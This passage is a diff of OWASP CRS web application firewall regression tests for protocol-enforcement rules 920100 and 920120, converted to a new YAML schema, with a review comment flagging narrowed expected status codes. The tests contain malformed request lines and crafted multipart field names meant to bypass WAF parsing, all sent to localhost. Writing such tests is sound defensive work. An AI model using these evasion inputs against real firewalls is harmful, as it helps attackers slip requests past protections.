@@ -1,276 +1,268 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920100.yaml" description: "Tests to trigger, or not trigger 920100" +rule_id: 920100 tests: - - test_title: 920100-1 + - test_id: 1 desc: Standard GET request stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920100] + - test_id: 2 desc: | Request has tab (\t) before request method - Apache complains AH00126: Invalid URI in request GET / HTTP/1.1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: " GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - status: [400] - - test_title: 920100-3 + - input: + dest_addr: "127.0.0.1" + method: " GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 3 desc: Perfectly valid OPTIONS request stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "OPTIONS" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "*" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-4 + - input: + dest_addr: "127.0.0.1" + method: "OPTIONS" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "*" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920100] + - test_id: 4 desc: Valid CONNECT stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "CONNECT" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "1.2.3.4:80" - version: "HTTP/1.1" - output: - status: [200] - no_log_contains: "id \"920100\"" - - test_title: 920100-5 + - input: + dest_addr: "127.0.0.1" + method: "CONNECT" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "1.2.3.4:80" + version: "HTTP/1.1" + output: + status: 200 + log: + no_expect_ids: [920100] + - test_id: 5 desc: invalid Connect request, domains require ports stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "CONNECT" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "www.coreruleset.org" - version: "HTTP/1.1" - output: - status: [400] - - test_title: 920100-6 + - input: + dest_addr: "127.0.0.1" + method: "CONNECT" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "www.coreruleset.org" 
+ version: "HTTP/1.1" + output: + status: 400 + - test_id: 6 desc: This is an acceptable CONNECT request for SSL tunneling stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "CONNECT" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "www.coreruleset.org:80" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-7 + - input: + dest_addr: "127.0.0.1" + method: "CONNECT" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "www.coreruleset.org:80" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920100] + - test_id: 7 desc: Valid request with query and anchor components stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/index.html?I=Like&Apples=Today#tag" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-8 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/index.html?I=Like&Apples=Today#tag" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920100] + - test_id: 8 desc: | - The colon in the path is not allowed. Apache will block by default + The colon in the path is not allowed. 
Apache will block by default: (20024)The given path is misformatted or contained invalid characters: [client 127.0.0.1:4142] AH00127: Cannot map GET /index.html:80?I=Like&Apples=Today#tag HTTP/1.1 to file stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get/index.html:80?I=Like&Apples=Today#tag" - version: "HTTP/1.1" - output: - status: [400, 403] - - test_title: 920100-9 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get/index.html:80?I=Like&Apples=Today#tag" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 9 desc: Normal Options request with path stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "OPTIONS" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-10 + - input: + dest_addr: "127.0.0.1" + method: "OPTIONS" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920100] + - test_id: 10 desc: An invalid method with a long name stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "REALLYLONGUNREALMETHOD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920100\"" - - test_title: 920100-11 + - input: + dest_addr: "127.0.0.1" + method: "REALLYLONGUNREALMETHOD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920100] + - test_id: 11 desc: | - An invalid request because a backslash is used in uri + An invalid request because a backslash is used in URI. Apache will end up blocking this before it gets to CRS. - We will need to support OR output tests to fix this + We will need to support OR output tests to fix this. stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "\\" - version: "HTTP/1.1" - output: - status: [403, 400] - - test_title: 920100-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "\\" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 12 desc: Invalid HTTP Request Line (920100) - Test 1 from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: "\tGET" - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - status: [400] - - test_title: 920100-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: "\tGET" + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + status: 400 + - test_id: 13 desc: Invalid HTTP Request Line (920100) - Test 2 from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: \index.html - version: HTTP\1.0 - output: - status: [403, 400] - - test_title: 920100-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: \index.html + version: HTTP\1.0 + output: + status: 400 + - test_id: 14 desc: Invalid HTTP Request Line (920100) - Test 3 from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: '|GET' - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "920100" - - test_title: 920100-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: '|GET' + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [920100] + - 
test_id: 15 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - status: [403, 400] - - test_title: 920100-16 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + status: 400 + - test_id: 16 desc: "Status Page Test - Invalid HTTP request line: URI has scheme and authority but no path" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "http://localhost" - version: "HTTP/1.1" - output: - log_contains: "id \"920100\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "http://localhost" + version: "HTTP/1.1" + output: + log: + expect_ids: [920100] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml index 848cebe9b..703b8f78f 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml 
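Review bot: Tests 8, 11, 13 and 15 replace `status: [400, 403]` / `status: [403, 400]` with `status: 400`, which silently drops the outcome where the malformed request line reaches CRS and rule 920100 blocks it with 403 instead of the web server rejecting it with 400; the old list encoded that either result was acceptable. The description of test 11 still says Apache blocks the request before it gets to CRS and that OR output tests are needed, so the text and the new single-status expectation now contradict each other. If the new format only accepts one status (inferred from the other converted files), the description of test 11 should be updated to state why only 400 is expected, e.g. `Apache rejects the backslash URI with 400 before CRS runs, so 403 is not expected here.`, and tests 8, 13 and 15 would benefit from the same one-line note so the next maintainer does not reintroduce 403 when running against a backend that lets the request through to CRS. The hunk covers the whole file, so these four are the only tests affected.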
@@ -1,969 +1,968 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920120.yaml" description: "Tests to trigger rule 920120" +rule_id: 920120 tests: - - test_title: 920120-1 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en" - Connection: "close" - Referer: "http://localhost/" - Content-Type: "multipart/form-data; boundary=--------397236876" - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="file=.txt" - Content-Type: text/plain - - 555-555-0199@example.com - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-2 + - test_id: 1 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en" + Connection: "close" + Referer: "http://localhost/" + Content-Type: "multipart/form-data; boundary=--------397236876" + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="file=.txt" + Content-Type: text/plain + + 555-555-0199@example.com + ----------397236876-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 2 desc: Attempted multipart/form-data bypass (920120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: gzip, deflate - Accept-Language: en-us,en;q=0.5 - Connection: keep-alive - Content-Type: multipart/form-data; 
boundary=---------------------------627652292512397580456702590 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: /cgi-bin/fup.cgi - version: HTTP/1.1 - data: | - -----------------------------627652292512397580456702590 - Content-Disposition: form-data; name="fi=le"; filename="test" - Content-Type: text/plain - - email: security@example.com - - -----------------------------627652292512397580456702590 - Content-Disposition: form-data; name="note" - - Contact info. - -----------------------------627652292512397580456702590-- - output: - log_contains: id "920120" - - test_title: 920120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: gzip, deflate + Accept-Language: en-us,en;q=0.5 + Connection: keep-alive + Content-Type: multipart/form-data; boundary=---------------------------627652292512397580456702590 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: /cgi-bin/fup.cgi + version: HTTP/1.1 + data: | + -----------------------------627652292512397580456702590 + Content-Disposition: form-data; name="fi=le"; filename="test" + Content-Type: text/plain + + email: security@example.com + + -----------------------------627652292512397580456702590 + Content-Disposition: form-data; name="note" + + Contact info. 
+ -----------------------------627652292512397580456702590-- + output: + log: + expect_ids: [920120] + - test_id: 3 desc: Invalid Request Body (920120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: en-us,en;q=0.5 - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: / - version: HTTP/1.1 - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="fi;le"; filename="test" - Content-Type: application/octet-stream - - Rotem & Ayala - - -----------------------------265001916915724 - Content-Disposition: form-data; name="name" - - tt2 - -----------------------------265001916915724 - Content-Disposition: form-data; name="B1" - - Submit - -----------------------------265001916915724-- - output: - log_contains: id "920120" - - test_title: 920120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: en-us,en;q=0.5 + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + version: HTTP/1.1 + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="fi;le"; filename="test" + Content-Type: application/octet-stream + + Rotem & Ayala + + -----------------------------265001916915724 + Content-Disposition: form-data; name="name" + + tt2 + -----------------------------265001916915724 + Content-Disposition: form-data; name="B1" + + Submit + 
-----------------------------265001916915724-- + output: + log: + expect_ids: [920120] + - test_id: 4 desc: Attempted multipart/form-data bypass (920120). Negative test. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="file"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" - - test_title: 920120-5 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="file"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] + - test_id: 5 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name=";zzzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-6 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name=";zzzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 6 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="amp;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-7 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="amp;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 7 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="mp;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-8 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="mp;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 8 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="p;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-9 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="p;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 9 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="Zamp;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-10 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="Zamp;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 10 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="Zmp;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-11 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="Zmp;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 11 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="Zp;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-12 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="Zp;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 12 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="Z;zzz"; filename="test" - Content-Type: application/octet-stream - - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-13 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="Z;zzz"; filename="test" + Content-Type: application/octet-stream + + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] + - test_id: 13 desc: Attempted multipart/form-data bypass (920120). 
